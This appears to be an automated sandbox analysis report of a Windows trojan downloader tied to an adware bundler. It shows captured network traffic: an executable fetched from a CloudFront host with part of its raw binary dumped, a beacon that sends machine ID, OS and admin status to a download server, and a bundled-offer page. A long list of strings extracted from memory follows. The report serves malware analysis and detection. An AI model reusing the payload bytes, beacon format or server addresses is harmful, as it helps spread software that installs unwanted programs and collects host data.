X-Amz-Cf-Id: m3nP3_KmswDMLUQU7y5gPFRmzO_2CoE9EQ44TfQAfOnreAUL3Z1NKQ==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Server: nginx/1.8.0..Date: Mon, 18 Jul 2016 23:41:27 GMT..X-Cache: Miss from cloudfront..Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)..X-Amz-Cf-Id: m3nP3_KmswDMLUQU7y5gPFRmzO_2CoE9EQ44TfQAfOnreAUL3Z1NKQ==......
GET /main/tmnqck.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d3tufnia3qwp0y.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 353992
Connection: keep-alive
Date: Mon, 18 Jul 2016 23:41:24 GMT
Last-Modified: Mon, 18 Jul 2016 23:30:39 GMT
ETag: "54359f8ab1edeba9bf9f1f54346ec7d8"
x-amz-storage-class: REDUCED_REDUNDANCY
x-amz-meta-content-md5: 54359f8ab1edeba9bf9f1f54346ec7d8
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 8cdc69e06e564b9aef153cf0b52204b0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Q4uVE8CsHHM7-nJS7mHy7uv6H-OetHuOgUkqcy2ceuT4k_vvFp-H4w==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b||.b||.b||.o...@||.o...)||.o....||.$-..`||.k...{||.b|}..||.....L||.o...c||.b|..`||.....c||.Richb||.........PE..L....J.W.................J...f.......p.......`....@..................................`......................................<,.......................P..................................................@............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data........@.......*..............@....rsrc................H..............@..@........................................................................................................................................................................................................................................................................................................................................................................................Q..........hPYD..uF..Y...{.....E...A.E..:......E..T...h}YD..JF..Y....E......hsYD..4F..Y....E......hiYD...F..Y.j....E...}...j....E...}...j....E...}...j....E...}..................E.E............Q.H.E...M....P.E...%P.E.....h.YD...T.E.......E..Y................Y.E..\.........h..D..\.E...(..h.YD..aE..Y.......u.E..,.........j....E...}.......y.E............h.YD.. E..Y..`]E...A..h.YD...E..Y.h.YD...D..Y.h.YD...D..Y...mE......h.YD...D..Y.h.YD...D..Y..XnE......h.YD...D..Y...............U..QSVW........N.......N0....
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.continuumdownload.com
Content-Length: 583
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=99999&cmdl=amisetup7604__99999_il2.exe /s /ver 1.1.2.41 /u http://VVV.continuumdownload.com/index.php /ta /ci 99999 /i NationZoom&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup7604__99999_il2&ffver=&i=NationZoom&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAzAA==&netfs=3&s=Y&ts=1468885284&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Jul 2016 23:41:22 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
2d61....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>nop</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="http://VVV.continuumdownload.com:80/index.php" />. <script type="text/javascript" src="hXXp://cdn1.downloadaxel.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r__capp="nop";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';. var g_finish_install_button = '0';. var g_popup_install_all = '0';. var g_eula = '';. var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=99999&_psb=0&_cnt=70485cab8ae29501976866d3a3ff09b2&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=0&_vert=3';. var g_icon = '';. var g_comps = [], g_pages = [], c, g_curPage = -1;. var g_cid = '99999';. var g_tid = '';. var g_cc = 'UA';. var g_lang = 'en';. var g_ip = '194.242.96.226';. var g_browser = 'ie';. var g_cnt = '9a2093ee772cbb280d9dbc8af51a
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.continuumdownload.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.continuumdownload.com
Content-Length: 204
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=99999&_psb=0&_cnt=70485cab8ae29501976866d3a3ff09b2&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=0&_vert=3&r_nop=0&r_NationZoom=1&nop=3&NationZoom=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Mon, 18 Jul 2016 23:41:22 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2455
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><short_name></short_name><must_show>0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZGl2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlkPSJhbWlfY2hlY2tfTmF0aW9uWm9vbSIgb25jbGljaz0iQW1pQ2hlY2tDdHJsQ2xpY2tlZCgpIj4KICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBpZD0iaV9hbWlfTmF0aW9uWm9vbSIgbmFtZT0iSG9ob3NlYXJjaCIgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgLz48L2Rpdj48ZGl2IGNsYXNzPSJjbGFzcy1saW5lMSI PHNwYW4 U2V0IEhvaG9zZWFyY2ggYXMgaG9tZXBhZ2UgYW5kIGRlZmF1bHQgc2VhcmNoIG9uIENocm9tZSBhbmQgRmlyZWZveCBicm93c2VyLjwvc3Bhbj48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSJjbGFzcy1saW5lMiI PHNwYW4 QnkgY2xpY2tpbmcgIk5leHQiIG9yICJJbnN0YWxsIiBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vdGlueXVybC5jb20vaDR3cjk5YiIgdGFyZ2V0PSJfYmxhbmsiPiBFdWxhPC9hPiBhbmQgPGEgaHJlZj0iaHR0cDovL3Rpbnl1cmwuY29tL2o5anQyeHYiIHRhcmdldD0iX2JsYW5rIj5Qcml2YWN5IFBvbGljeSA8L2E IGFuZCBjb25zZW50IHRvIGluc3RhbGwgSG9ob3NlYXJjaC48L3NwYW4 PC9kaXY PC9kaXY PGlucHV0IHR5cGU9ImhpZGRlbiIgdmFsdWU9IjEiIGlkPSJpX2FtaV9ub3AiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iTmF0aW9uWm9vbSxub3AiIGlkPSJhbGxfc2hvcnRfbmFtZXMiLz4=</bdy><img>__empty__</img></page><page><f>1</f><fb>0</fb><pt>1</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><short_name>
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_600:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\xutility
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c
%s(%d) :
%s(%d) :
%s_%0x
%s_%0x
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c
Client hook allocation failure at file %hs line %d.
Client hook allocation failure at file %hs line %d.
Memory allocated at %hs(%d).
Memory allocated at %hs(%d).
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure at file %hs line %d.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
CRT detected that the application wrote to memory after end of heap buffer.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to memory before start of heap buffer.
CRT detected that the application wrote to a heap buffer that was freed.
CRT detected that the application wrote to a heap buffer that was freed.
crt block at 0x%p, subtype %x, %Iu bytes long.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
%hs(%d) :
#File Error#(%d) :
#File Error#(%d) :
Data: %s
Data: %s
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c
_CrtDbgReport: String too long or IO Error
_CrtDbgReport: String too long or IO Error
Debug %s!
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s%s
Program: %s%s%s%s%s%s%s%s%s%s%s%s
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
%s(%d) : %s
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
_CrtDbgReport: String too long or Invalid characters in String
GetProcessWindowStation
GetProcessWindowStation
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\read.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
portuguese-brazilian
portuguese-brazilian
Run-Time Check Failure #%d - %s
Run-Time Check Failure #%d - %s
%s%s%s%s
%s%s%s%s
%s%s%p%s%ld%s%d%s
%s%s%p%s%ld%s%d%s
operator
operator
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xlocale
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xlocale
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xiosbase
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xiosbase
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\streambuf
c:\Program Files\Microsoft Visual Studio 10.0\VC\include\streambuf
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h
C:\iPumper\iPumper\YoutubeUploader\SilentUpdater4\Release\ajdfhsjdh.pdb
C:\iPumper\iPumper\YoutubeUploader\SilentUpdater4\Release\ajdfhsjdh.pdb
RPCRT4.dll
RPCRT4.dll
RegOpenKeyW
RegOpenKeyW
RegCreateKeyW
RegCreateKeyW
ADVAPI32.dll
ADVAPI32.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
SHFileOperationW
SHFileOperationW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpSetOption
WinHttpSetOption
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSendRequest
WinHttpSendRequest
WinHttpWriteData
WinHttpWriteData
WinHttpConnect
WinHttpConnect
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpen
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpReadData
WinHttpReadData
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WINHTTP.dll
WINHTTP.dll
USERENV.dll
USERENV.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
8$8,8[8`8
8$8,8[8`8
5 5$5(5,5054585
5 5$5(5,5054585
6 70757^7
6 70757^7
6$61666
6$61666
:1:6:;:}:
:1:6:;:}:
;'
;'
; ;$;(;,;0;4;
; ;$;(;,;0;4;
1 1$1(1,10141
1 1$1(1,10141
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
4 4@4`4|4
4 4@4`4|4
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp
%S(%d) :
%S(%d) :
ppCategory && pfnCrtDbgReport
ppCategory && pfnCrtDbgReport
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpcoll.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpcoll.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlstr.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h
Bf:\dd\vctools\crt_bld\self_x86\crt\src\dbgdel.cpp
Bf:\dd\vctools\crt_bld\self_x86\crt\src\dbgdel.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwscanf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwscanf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
Ff:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
Ff:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"")
wcscpy_s(szExeName, 260, L"")
__crtMessageWindowW
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "")
strcpy_s(szExeName, 260, "")
__crtMessageWindowA
__crtMessageWindowA
mscoree.dll
mscoree.dll
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
_VCrtDbgReportW
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
WUSER32.DLL
WUSER32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
KERNEL32.DLL
KERNEL32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
_NMSG_WRITE
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
Bf:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
Bf:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
user32.dll
user32.dll
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
